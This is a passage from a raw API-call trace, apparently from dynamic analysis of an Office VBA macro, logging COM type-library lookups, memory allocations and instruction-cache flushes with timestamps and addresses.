ppvObject=0x2042b8 | out: ppvObject=0x2042b8*=0x0) returned 0x80004002 [0045.733] IUnknown:QueryInterface (in: This=0x7f7ab68, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042b0 | out: ppvObject=0x2042b0*=0x0) returned 0x80004002 [0045.733] IUnknown:AddRef (This=0x7f7ab68) returned 0x5 [0045.733] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x204508, pDummy=0x40d3630 | out: ppTypeAttr=0x204508, pDummy=0x40d3630*=0x4) returned 0x0 [0045.733] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.733] IUnknown:Release (This=0x7f7ab68) returned 0x4 [0045.733] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.733] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.733] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.733] GetCurrentProcess () returned 0xffffffffffffffff [0045.733] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.733] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.733] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203aa0, pDummy=0x0 | out: ppTypeAttr=0x203aa0, pDummy=0x0) returned 0x0 [0045.733] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.733] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x81f9bb0 [0045.733] wcscpy_s (in: _Destination=0x81d91b8, _SizeInWords=0x4, _Source="Run" | out: _Destination="Run") returned 0x0 [0045.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f03b6, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="Ass") returned 4 [0045.733] ITypeComp:RemoteBind (in: This=0x7edf750, szName="Ass", lHashVal=0x107531, wFlags=0x5, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f03b6, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="Ass") returned 4 [0045.733] ITypeComp:RemoteBind (in: This=0x3dd7b90, szName="Ass", lHashVal=0x107531, wFlags=0x5, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f03b6, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="Ass") returned 4 [0045.734] ITypeComp:RemoteBind (in: This=0x7ee0560, szName="Ass", lHashVal=0x107531, wFlags=0x5, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x8125440, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.734] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ass") returned 0x107531 [0045.734] strcpy_s (in: _Dst=0x2045f0, _DstSize=0x4, _Src="Ass" | out: _Dst="Ass") returned 0x0 [0045.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2045f0, cbMultiByte=4, lpWideCharStr=0x204440, cchWideChar=4 | out: lpWideCharStr="Ass") returned 4 [0045.734] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.734] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Ass", lHashVal=0x107531, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.734] IUnknown:Release (This=0x7edf740) returned 0xb [0045.734] IUnknown:AddRef (This=0x3dd7b80) returned 0x2a [0045.734] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="Ass", lHashVal=0x107531, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.734] IUnknown:Release (This=0x3dd7b80) returned 0x29 [0045.734] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.734] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="Ass", lHashVal=0x107531, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.734] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.734] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.734] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="Ass", lHashVal=0x107531, pfName=0x204510, pBstrLibName=0x204440 | out: pfName=0x204510*=0, pBstrLibName=0x204440) returned 0x0 [0045.734] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f03b6, cbMultiByte=4, lpWideCharStr=0x204690, cchWideChar=5 | out: lpWideCharStr="Ass") returned 4 [0045.734] ITypeComp:RemoteBind (in: This=0x7edffc0, szName="Ass", lHashVal=0x107531, wFlags=0x5, ppTInfo=0x204648, pDescKind=0x20465c, ppFuncDesc=0x204660, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204648*=0x0, pDescKind=0x20465c*=0, ppFuncDesc=0x204660, ppVarDesc=0x7fee3e6230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.734] IMalloc:Alloc (This=0x7feff045380, cb=0xb) returned 0x817bcd0 [0045.734] _mbscpy_s (in: _Dst=0x817bcd0, _DstSizeInBytes=0x4, _Src=0x33f03b6 | out: _Dst=0x817bcd0) returned 0x0 [0045.734] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Ass") returned 0x103242 [0045.734] strcpy_s (in: _Dst=0x2047a0, _DstSize=0xb, _Src="_B_var_Ass" | out: _Dst="_B_var_Ass") returned 0x0 [0045.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2047a0, cbMultiByte=11, lpWideCharStr=0x2045f0, cchWideChar=11 | out: lpWideCharStr="_B_var_Ass") returned 11 [0045.734] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.734] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="_B_var_Ass", lHashVal=0x103242, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.734] IUnknown:Release (This=0x7edf740) returned 0xb [0045.734] IUnknown:AddRef (This=0x3dd7b80) returned 0x2a [0045.734] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="_B_var_Ass", lHashVal=0x103242, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.734] IUnknown:Release (This=0x3dd7b80) returned 0x29 [0045.734] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.735] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="_B_var_Ass", lHashVal=0x103242, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.735] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.735] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.735] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="_B_var_Ass", lHashVal=0x103242, pfName=0x2046c0, pBstrLibName=0x2045f0 | out: pfName=0x2046c0*=0, pBstrLibName=0x2045f0) returned 0x0 [0045.735] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.735] IUnknown:AddRef (This=0x7edf740) returned 0xc [0045.735] IUnknown:Release (This=0x7edf740) returned 0xb [0045.735] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0506, cbMultiByte=11, lpWideCharStr=0x204650, cchWideChar=12 | out: lpWideCharStr="_B_var_Ass") returned 11 [0045.735] ITypeComp:RemoteBind (in: This=0x7edf750, szName="_B_var_Ass", lHashVal=0x103242, wFlags=0x5, ppTInfo=0x204608, pDescKind=0x20461c, ppFuncDesc=0x204620, ppVarDesc=0x41005f00720061, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204608*=0x0, pDescKind=0x20461c*=0, ppFuncDesc=0x204620, ppVarDesc=0x41005f00720061, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.735] _mbscpy_s (in: _Dst=0x204810, _DstSizeInBytes=0x4, _Src=0x33f03b6 | out: _Dst=0x204810) returned 0x0 [0045.735] IMalloc:Free (This=0x7feff045380, pv=0x817bcd0) [0045.735] IMalloc:Realloc (This=0x7feff045380, pv=0x813f060, cb=0xc0) returned 0x8134a80 [0045.735] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x40f0000 [0045.736] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x8128768, ppTLib=0x204500, pIndex=0x0 | out: ppTLib=0x204500*=0x7edf740, pIndex=0x0) returned 0x0 [0045.736] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204510, pDummy=0x0 | out: ppTLibAttr=0x204510, pDummy=0x0) returned 0x0 [0045.736] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.736] IUnknown:Release (This=0x7edf740) returned 0xb [0045.736] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x204500, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0045.736] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0045.736] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x204500, pbstrName=0x0, pwOrdinal=0x204520 | out: pBstrDllName=0x204500*=0x0, pbstrName=0x0, pwOrdinal=0x204520*=0x4790) returned 0x0 [0045.736] ITypeInfo:RemoteGetDllEntry (in: This=0x8128768, memid=1610612736, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x204500, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x204500, pwOrdinal=0x500000000) returned 0x0 [0045.737] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x81287c0, ppTLib=0x2044f0, pIndex=0x0 | out: ppTLib=0x2044f0*=0x7edf740, pIndex=0x0) returned 0x0 [0045.737] ITypeLib:RemoteGetLibAttr (in: This=0x7edf740, ppTLibAttr=0x204500, pDummy=0x0 | out: ppTLibAttr=0x204500, pDummy=0x0) returned 0x0 [0045.737] ITypeLib:LocalReleaseTLibAttr (This=0x7edf740) returned 0x0 [0045.737] IUnknown:Release (This=0x7edf740) returned 0xb [0045.737] ITypeInfo:RemoteGetDllEntry (in: This=0x81287c0, memid=1610612738, invkind=1, refPtrFlags=0x2044f0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2663100*=0x5380) returned 0x0 [0045.737] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee406d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0045.737] ITypeInfo:RemoteGetDllEntry (in: This=0x81287c0, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x2044f0, pbstrName=0x0, pwOrdinal=0x204510 | out: pBstrDllName=0x2044f0*=0x0, pbstrName=0x0, pwOrdinal=0x204510*=0x4780) returned 0x0 [0045.737] ITypeInfo:RemoteGetDllEntry (in: This=0x81287c0, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x2044f0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x2044f0, pwOrdinal=0x500000000) returned 0x0 [0045.738] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x202f48, pDummy=0x203004 | out: ppTypeAttr=0x202f48, pDummy=0x203004*=0x0) returned 0x0 [0045.738] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.738] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x81fa000 [0045.738] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] GetCurrentProcess () returned 0xffffffffffffffff [0045.738] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.738] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.738] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x202f50, pDummy=0x0 | out: ppTypeAttr=0x202f50, pDummy=0x0) returned 0x0 [0045.738] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.738] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] GetCurrentProcess () returned 0xffffffffffffffff [0045.738] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.738] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.738] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203190, pDummy=0x0 | out: ppTypeAttr=0x203190, pDummy=0x0) returned 0x0 [0045.738] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.738] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.738] GetCurrentProcess () returned 0xffffffffffffffff [0045.738] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.738] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.738] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x2033d0, pDummy=0x0 | out: ppTypeAttr=0x2033d0, pDummy=0x0) returned 0x0 [0045.738] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.738] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.739] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.739] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.739] GetCurrentProcess () returned 0xffffffffffffffff [0045.739] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.739] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.739] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203610, pDummy=0x0 | out: ppTypeAttr=0x203610, pDummy=0x0) returned 0x0 [0045.739] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.739] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.739] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.739] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.739] GetCurrentProcess () returned 0xffffffffffffffff [0045.739] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.739] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.739] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203850, pDummy=0x0 | out: ppTypeAttr=0x203850, pDummy=0x0) returned 0x0 [0045.739] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.739] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x202f48, pDummy=0x203004 | out: ppTypeAttr=0x202f48, pDummy=0x203004*=0x0) returned 0x0 [0045.739] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.741] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] GetCurrentProcess () returned 0xffffffffffffffff [0045.741] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.741] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.741] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x202f50, pDummy=0x0 | out: ppTypeAttr=0x202f50, pDummy=0x0) returned 0x0 [0045.741] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.741] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] GetCurrentProcess () returned 0xffffffffffffffff [0045.741] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.741] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.741] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203190, pDummy=0x0 | out: ppTypeAttr=0x203190, pDummy=0x0) returned 0x0 [0045.741] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.741] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] GetCurrentProcess () returned 0xffffffffffffffff [0045.741] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.741] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.741] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x2033d0, pDummy=0x0 | out: ppTypeAttr=0x2033d0, pDummy=0x0) returned 0x0 [0045.741] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.741] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.741] GetCurrentProcess () returned 0xffffffffffffffff [0045.741] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.741] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.741] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203610, pDummy=0x0 | out: ppTypeAttr=0x203610, pDummy=0x0) returned 0x0 [0045.741] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.741] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.741] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] GetCurrentProcess () returned 0xffffffffffffffff [0045.742] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.742] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.742] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203850, pDummy=0x0 | out: ppTypeAttr=0x203850, pDummy=0x0) returned 0x0 [0045.742] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.742] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x203048, pDummy=0x203104 | out: ppTypeAttr=0x203048, pDummy=0x203104*=0x30000) returned 0x0 [0045.742] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.742] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] GetCurrentProcess () returned 0xffffffffffffffff [0045.742] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.742] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.742] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203050, pDummy=0x0 | out: ppTypeAttr=0x203050, pDummy=0x0) returned 0x0 [0045.742] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.742] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] GetCurrentProcess () returned 0xffffffffffffffff [0045.742] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.742] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.742] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203290, pDummy=0x0 | out: ppTypeAttr=0x203290, pDummy=0x0) returned 0x0 [0045.742] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.742] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.742] GetCurrentProcess () returned 0xffffffffffffffff [0045.742] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.742] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.742] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x2034d0, pDummy=0x0 | out: ppTypeAttr=0x2034d0, pDummy=0x0) returned 0x0 [0045.742] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.742] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.742] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] GetCurrentProcess () returned 0xffffffffffffffff [0045.743] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.743] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.743] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aab8, ppTypeAttr=0x203710, pDummy=0x0 | out: ppTypeAttr=0x203710, pDummy=0x0) returned 0x0 [0045.743] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aab8) returned 0x0 [0045.743] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] GetCurrentProcess () returned 0xffffffffffffffff [0045.743] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.743] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.743] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7ab68, ppTypeAttr=0x203950, pDummy=0x0 | out: ppTypeAttr=0x203950, pDummy=0x0) returned 0x0 [0045.743] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7ab68) returned 0x0 [0045.743] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72088, ppTypeAttr=0x203128, pDummy=0x2031e4 | out: ppTypeAttr=0x203128, pDummy=0x2031e4*=0x30000) returned 0x0 [0045.743] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72088) returned 0x0 [0045.743] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] GetCurrentProcess () returned 0xffffffffffffffff [0045.743] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.743] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.743] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72138, ppTypeAttr=0x203130, pDummy=0x0 | out: ppTypeAttr=0x203130, pDummy=0x0) returned 0x0 [0045.743] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72138) returned 0x0 [0045.743] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] GetCurrentProcess () returned 0xffffffffffffffff [0045.743] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x4c) returned 1 [0045.743] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.743] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f723a0, ppTypeAttr=0x203370, pDummy=0x0 | out: ppTypeAttr=0x203370, pDummy=0x0) returned 0x0 [0045.743] ITypeInfo:LocalReleaseTypeAttr (This=0x7f723a0) returned 0x0 [0045.743] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6a90) returned 0x26d [0045.743] GetCurrentProcess () returned 0xffffffffffffffff [0045.744] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6a90, dwSize=0x54) returned 1 [0045.744] IMalloc:Free (This=0x7feff045380, pv=0x81f6a90) [0045.744] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f7aa08, ppTypeAttr=0x2035b0, pDummy=0x0 | out: ppTypeAttr=0x2035b0, pDummy=0x0) returned 0x0 [0045.744] ITypeInfo:LocalReleaseTypeAttr (This=0x7f7aa08) returned 0x0 [0045.744] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6a90 